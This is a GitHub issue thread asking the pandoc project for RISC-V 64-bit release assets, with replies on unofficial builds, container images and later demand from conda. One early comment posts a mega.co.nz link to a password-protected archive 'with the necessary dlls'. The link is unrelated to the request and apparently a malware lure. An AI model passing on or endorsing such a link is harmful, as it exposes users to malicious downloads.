### ISSUE TITLE
Add RISC-V 64-bit release assets

### ISSUE THREAD

**Issue by benz0li** [jgm/pandoc#10205]
**Describe your proposed improvement and the problem it solves.**

Build releases for Linux/RISC-V (64-bit).

**Describe alternatives you've considered.**

\- (There is none)

Related to:

* https://github.com/jgm/pandoc/pull/10197

**Comment by SAMBILI** [comment]
try this
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by benz0li** [comment]
Unofficial and untested RISC-V 64-bit release assets for pandoc 3.4:

* https://dl.b-data.ch/pandoc/3.4/pandoc-3.4-1-riscv64.deb
* https://dl.b-data.ch/pandoc/3.4/pandoc-3.4-linux-riscv64.tar.gz

**Comment by benz0li** [comment]
@jgm As soon as there is a new release of GHC 9.10 I will add the `linux/riscv64` image to the `quay.io/benz0li/ghc-musl:9.10.1` [*GHC musl*](https://github.com/benz0li/ghc-musl) docker manifest.

ℹ️ pandoc builds just fine with both GHC v9.8.2 and GHC v9.10.1.

**Comment by benz0li** [comment]
The `linux/riscv64` *GHC musl* image is built the same way as for the other `os/arch`s.

`linux/riscv64` images are currently built only once. Therefore, vulnerabilities for this `os/arch` will not be fixed.

ℹ️ `linux/riscv64` images added to the manifest, as soon as a new version is released – i.e. [the image for the old version is *frozen*](https://github.com/benz0li/ghc-musl/blob/main/SECURITY.md#vulnerabilities-in-prior-versions).

**Comment by benz0li** [comment]
> RISC-V is an [open standard](https://en.wikipedia.org/wiki/Open_standard) [instruction set architecture](https://en.wikipedia.org/wiki/Instruction_set_architecture) (ISA) based on established [reduced instruction set computer](https://en.wikipedia.org/wiki/Reduced_instruction_set_computer) (RISC) principles.

– https://en.wikipedia.org/wiki/RISC-V

**Comment by benz0li** [comment]
From a data scientist’s perspective: RISC-V makes it possible to run open-source software on «open hardware».

My goal is to offer `linux/riscv64` container images for all of b-data’s/my docker stacks: https://github.com/b-data

OS (Debian/Ubuntu) and programming languages (Python, R) are ready. The latest versions of tools like Git, Git LFS, etc. can be built on Linux/riscv64.

**Comment by benz0li** [comment]
IMHO RISC-V (64-bit) is the future, because it is an open and royalty free ISA: Open-source software *ideally* runs on «open hardware».

x86 (Intel, AMD) and Arm64 (Arm) ISA are neither open nor royalty free: https://en.wikipedia.org/wiki/Comparison_of_instruction_set_architectures

**Comment by benz0li** [comment]
It is not necessary that RISC-V 64-bit release assets be available immediately.

I just want this to be kept in mind.

**Comment by jgm** [comment]
OK, sure.  I think it makes sense to wait until there is a real demand for these assets; at that point we could add them easily.  But doing it prematurely just creates more work in a release.

**Comment by benz0li** [comment]
ℹ️ I may start building and releasing *unofficial* ~~and *untested*~~ RISC-V release assets at https://gitlab.b-data.ch/jgm/pandoc/-/releases until official RISC-V release assets are available.

**Comment by jgm** [comment]
That sounds great.

**Comment by benz0li** [comment]
*Unofficial* ~~and *untested*~~ RISC-V release assets are now available at https://gitlab.b-data.ch/jgm/pandoc/-/releases.  
ℹ️ These are built automatically as soon as a new version is tagged – and published if the build was successful.

Closing for now – until there is a real demand for *official* RISC-V release assets.

**Comment by luhenry** [comment]
:wave: hello! `conda` is missing the riscv64 assets for https://github.com/conda-forge/pandoc-feedstock/pull/171. It would be great if pandoc could have a release for `riscv64`, there is now growing demand for the software ecosystem. Please let me know if there is anything you would need to make this release and continuing support. Thank you! 🙏

**Comment by luhenry** [comment]
@jgm gentle ping, please let me know what you think, happy to help however I can. Thanks!
